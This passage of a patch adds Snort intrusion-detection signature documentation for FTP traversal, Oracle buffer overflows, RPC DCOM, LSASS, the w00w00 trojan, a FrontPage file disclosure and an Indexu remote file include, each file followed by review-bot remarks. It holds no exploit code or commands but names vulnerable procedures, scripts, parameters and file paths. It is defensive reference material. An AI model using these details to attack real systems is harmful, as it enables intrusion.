+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
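Review bot: Affected Systems is empty and Additional References has nothing under it, while the body alternates between 'web, web applications and ftp servers' (Detailed Information) and 'the ftp root directory' (Attack Scenarios); say which service and which traversal pattern the rule actually matches and list the affected software. Corrective Action says 'Apply the appropriate vendor supplied patches' although no vendor or product is named anywhere in the file, so the reader has nothing to patch.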
--- /dev/null
+++ b/doc/signatures/860.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+860
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
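Review bot: 'running ona web server' in Detailed Information should read 'running on a web server', and 'attackers choosing' in Impact and Detailed Information needs an apostrophe (attacker's). More substantively, nothing in the document identifies the CGI application or the request the rule matches; the Indexu document later in this patch names the script and parameter, and this one should do the same so the event can be triaged and Additional References filled in.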
--- /dev/null
+++ b/doc/signatures/462.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+462
+
+--
+
+Summary:
+This event is generated when an ICMP Type 7 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 7 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 7 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 7 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
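Review bot: the Impact section does not state an impact: 'ICMP Type 7 datagrams are not currently used by any known devices' belongs in Detailed Information, and Impact should say what the event means for the monitored network (probing, covert signalling or simply anomalous traffic, whichever the authors intend). There is no Affected Systems heading, the '--' separators after False Negatives and Corrective Action lack the blank line that precedes every other separator in this file, and Matthew Watchinski's address is in parentheses where every other contributor line uses angle brackets.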
--- /dev/null
+++ b/doc/signatures/2843.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2843
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repobject
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
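Review bot: this document and 2907.txt are identical apart from the Sid and the package name (sys.dbms_repcat_sna_utl here, sys.dbms_repcat_sna there), both for the procedure drop_snapshot_repobject; please confirm that each package name matches the content its rule inspects, since a swap between the two files would be invisible to a reader. The line beginning '. This procedure is included in' should be joined to the preceding line, 'Oracle Oracle9i' duplicates the vendor name, and Additional References is empty.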
--- /dev/null
+++ b/doc/signatures/2688.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2688
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure enable_receiver_trace
+. This procedure is included in
+sys.dbms_internal_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
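Review bot: same template defects as the other Oracle documents in this patch: the line '. This procedure is included in' should be joined to the 'enable_receiver_trace' line before it, 'Oracle Oracle9i' under Affected Systems duplicates the vendor name, and Additional References is empty for a named procedure in sys.dbms_internal_repcat. If these files are generated from one template, fix the template once rather than each copy.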
--- /dev/null
+++ b/doc/signatures/1973.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1973
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with ProFTP FTP server MKDIR command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of arbitrary commands with privileges of the process running the ProFTP server. 
+
+--
+Detailed Information:
+A vulnerability exists with the MKDIR command that can cause a buffer overflow and permit the execution of arbitrary commands with the privileges of the process running the Pr oFTP server.  The buffer overflow can be caused by supplying an argument of greater than 255 characters designating the new directory name.  
+--
+Affected Systems:
+Hosts running ProFTP 1.2.0pre4 
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the MKDIR command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0991
+
+Bugtraq:
+http://www.securityfocus.com/bid/612
+
+--
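Review bot: 'Pr oFTP' in Detailed Information contains a stray space, and the '--' that follows that section is missing the blank line present before every other separator in the file. The product is called ProFTPD, not 'ProFTP', throughout Summary, Impact, Detailed Information and Affected Systems. The FTP protocol command is MKD (MKDIR is the client-side name), so the Summary and Attack Scenarios should state the string the rule actually matches on the wire. The 255-character threshold in Detailed Information should be checked against the cited BID 612 / CAN-1999-0991 before publication.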
--- /dev/null
+++ b/doc/signatures/450.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+450
+
+--
+Summary:
+This event is generated when an ICMP "Time Exceeded" message is generated that has an invalid ICMP code.  
+
+--
+Impact:
+Informational.  This may indicate that the ICMP message has been crafted.
+
+--
+Detailed Information:
+An ICMP "Time Exceeded" message is issued when either the maximum number of hops has been exceeded or a timer has expired before all fragments have been received.  The ICMP code value for this message should be 0 or 1.  If a value of greater than 1 for the ICMP code is observed, it may be an indication that the packet was crafted with an invalid value.
+
+--
+Affected Systems:
+This traffic should have no adverse impact.
+
+--
+Attack Scenarios:
+An attacker may craft an ICMP "Time Exceeded" message with an invalid ICMP code.  A single packet itself is not harmful, but the unusual ICMP code may indicate that this packet was abnormally generated.
+
+--
+Ease of Attack:
+Simple. There are many packages available to generate ICMP messages.
+
+--
+False Positives:
+Although rare, it is possible to observe an ICMP "Time Exceeded" message with an ICMP code greater than 1 if it is generated by software that does not conform to standards.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+If a host or device in your network is generating this message, investigate why it does not have a standard ICMP code.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
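Review bot: Additional References is empty although Detailed Information rests on ICMP codes 0 and 1 being the only valid values for Time Exceeded; cite RFC 792, which defines them, so the claim can be verified. The Affected Systems entry 'This traffic should have no adverse impact' is an impact statement rather than a list of systems; 'None' or 'All hosts' fits the heading, and the sentence belongs in Impact.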
--- /dev/null
+++ b/doc/signatures/958.txt
@@ -0,0 +1,76 @@
+Rule:
+--
+Sid:
+958
+
+--
+
+Summary:
+This event is generated when an attempt is made to access a file with 
+sensitive information on a webserver with Microsoft Frontpage extensions
+enabled.
+
+--
+
+Impact:
+If successful, the attacker can read sensitive data about the Frontpage web.
+
+--
+
+Detailed Information:
+On systems running Microsoft Frontpage Extensions on IIS or Apache web 
+servers the file _vti_pvt/service.cnf exists which may contain sensitive
+information about the web server. This file is meant to be only used 
+internally by FPSE and never directly by the user.
+
+--
+
+Affected Systems:
+	Systems using Microsoft FrontPage Server Extensions 98
+
+--
+
+Attack Scenarios:
+An attacker can request the file from its standard location, entering the exact URL.
+
+--
+
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable direct access to the file /_vti_pvt/service.cnf.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1&NoWebContent=1
+
+
+
+
+
+
+--
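Review bot: the Microsoft reference URL wraps the knowledge base article (Q188/2/57, i.e. Q188257) inside a support.microsoft.com redirect and carries the query parameter 'NoWebContent=1' twice; the plain article address is enough and will age better. The file ends with six empty added lines before the closing '--', and 'Rule:' has no blank line after it, unlike the other documents in this patch. Corrective Action says to disable direct access to /_vti_pvt/service.cnf; since Detailed Information says the file is 'used internally by FPSE', state whether blocking client requests for it interferes with FrontPage publishing or is safe.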
--- /dev/null
+++ b/doc/signatures/3233.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3233
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
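Review bot: 'Expoit' in Ease of Attack should be 'Exploit'. Attack Scenarios describes 'a request for a file with an overly long filename via a network share', while Detailed Information describes 'malformed data via RPC' to 'an RPC port'; explain how the long filename reaches the RPC DCOM interface, otherwise the two sections read as two different vulnerabilities. Additional References is empty for a vulnerability that Corrective Action says is patchable; the Microsoft bulletin should be cited.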
--- /dev/null
+++ b/doc/signatures/3057.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3057
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
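Review bot: Additional References is empty although Detailed Information describes a precise defect (an ACE size of 0 inside a large NT ACL) and Affected Systems pins it to Ethereal 0.10.7 and prior; the Ethereal security advisory for this issue should be cited. In Attack Scenarios, 'containing large NT ACLs, the attacker then needs to specify' is a comma splice; split it into two sentences.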
--- /dev/null
+++ b/doc/signatures/1422.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+
+1422
+
+--
+Summary:
+This event is generated when an attempt is made to issue an attack against a machine using SNMP v1.
+
+--
+Impact:
+Varies depending on the implementation. Ranges from Denial of Service (DoS) to code execution.
+
+--
+Detailed Information:
+SNMP is a widely adopted protocol for managing IP networks, including individual network devices, and devices in aggregate. 
+
+Several network devices come pre-installed with this protocol for management and monitoring.
+
+A number of vulnerabilities exist in SNMP v1, including a community string buffer overflow, that will allow an attacker to execute arbitrary code or shutdown the service.
+
+--
+Affected Systems:
+Any implementation of SNMP v1 protocol
+	
+--
+Attack Scenarios:
+An attacker needs to send a specially crafted packet to UDP port 161 of a vulnerable device, causing a Denial of Service or execution of any command.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable SNMP v1 protocol, use SNMP v2 protocol.
+
+Use Ingress/Egress filtering on a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-03.html
+
+--
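Review bot: Corrective Action's 'Disable SNMP v1 protocol, use SNMP v2 protocol' needs qualification: the vulnerability described is a community string buffer overflow, and community-based SNMPv2c uses the same community-string model, so the advice should name SNMPv3 or explain how the recommended version avoids the flaw. Formatting: there is a stray blank line between 'Sid:' and '1422', the line after 'Any implementation of SNMP v1 protocol' is a lone tab, and 'shutdown the service' should be 'shut down the service'.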
--- /dev/null
+++ b/doc/signatures/3371.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3371
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
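Review bot: this file is identical to 3233.txt apart from the Sid, down to the 'Expoit' typo in Ease of Attack. If rules 3233 and 3371 inspect different traffic (a different transport, port or request form), Summary or Detailed Information should say what distinguishes them; otherwise an analyst seeing both events cannot tell why two exist. The mismatch between the network-share filename in Attack Scenarios and the malformed RPC request in Detailed Information applies here as well.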
--- /dev/null
+++ b/doc/signatures/2656.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2656
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with Netscape Network Security Services (NSS) message parsing.
+
+--
+Impact:
+A successful attack can cause a heap overflow and the subsequent execution
+of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way NSS parses a client connect SSLv2 message
+that can cause a heap overflow and the subsequent execution of arbitrary code
+on a vulnerable server.  This can occur when an overly long challenge length
+and accompanying data are supplied in a Client Hello message.
+
+--
+Affected Systems:
+Netscape Enterprise Webserver all versions
+Netscape Personalization Engine all versions
+Nescape Directory Server all versions
+Netscape Certificate Management Server all versions
+Sun One/iPlanet all versions
+
+--
+Attack Scenarios:
+An attacker can send a Client Hello message with an overly long challenge
+length and data, causing a heap overflow on a vulnerable server.
+
+--
+Ease of Attack:
+Difficult.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References:
+
+--
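Review bot: 'Nescape Directory Server' in Affected Systems should be 'Netscape'. 'a client connect SSLv2 message' in Detailed Information should use the 'Client Hello message' wording that the same paragraph and Attack Scenarios use, so the reader knows one message is meant. Additional References is empty for a described heap overflow in NSS; the vendor advisory should be cited.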
--- /dev/null
+++ b/doc/signatures/2728.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2728
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_raw
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
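Review bot: the package is given as 'dbms_repcat' without the 'sys.' schema prefix used by the other Oracle documents in this patch (sys.dbms_repcat_sna, sys.dbms_internal_repcat); use one form consistently so the package names can be compared. The same split sentence ('. This procedure is included in' starting a line), the duplicated 'Oracle Oracle9i' and the empty Additional References section recur here.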
--- /dev/null
+++ b/doc/signatures/209.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+209
+
+--
+Summary:
+w00w00 is a Trojan Horse utilizing Telnet. This event is generated when 
+an attacker attempts to connect to a w00w00 server using Telnet.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS510
+
+--
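Review bot: 'This Trojan affects UNIX operating systems:' in Detailed Information ends in a colon with nothing following it, and the file has no Affected Systems heading; either list the systems under that heading or end the sentence with a full stop. Corrective Action's 'Delete the Trojan and kill any associated processes' gives no file, process or port to look for, whereas the QAZ document in this patch names the files and registry value it installs; the same level of detail is needed here for the action to be followable.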
--- /dev/null
+++ b/doc/signatures/100000612.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000612
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_duplicate.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_duplicate.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
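Review bot: Attack Scenarios describes supplying credentials to an authentication mechanism, which is boilerplate from the generic CGI documents and does not match the Summary, which describes a remote file being passed in the 'admin_template_path' parameter of 'link_duplicate.php'; the scenario should describe that request. The third paragraph of Detailed Information (the credential-validation text) likewise describes a different class of flaw from a remote file include and could be dropped. Formatting: the '--' separators after the Sid, Affected Systems and Contributors lack the preceding blank line, 'running ona web server' needs a space, and the file ends with a trailing empty added line.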
--- /dev/null
+++ b/doc/signatures/2511.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2511
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
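Review bot: 'suscessful' and 'attcker' are misspelt, and 'The problem lies in an unchecked buffer in the LSASS service, suscessful exploitation may present...' is a comma splice; make it two sentences. Additional References is empty although Corrective Action treats the flaw as patchable; cite the Microsoft security bulletin for the LSASS overflow so the affected versions in Affected Systems ('Windows 2000, 2003 and XP') can be checked against it.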
--- /dev/null
+++ b/doc/signatures/1665.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1665
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
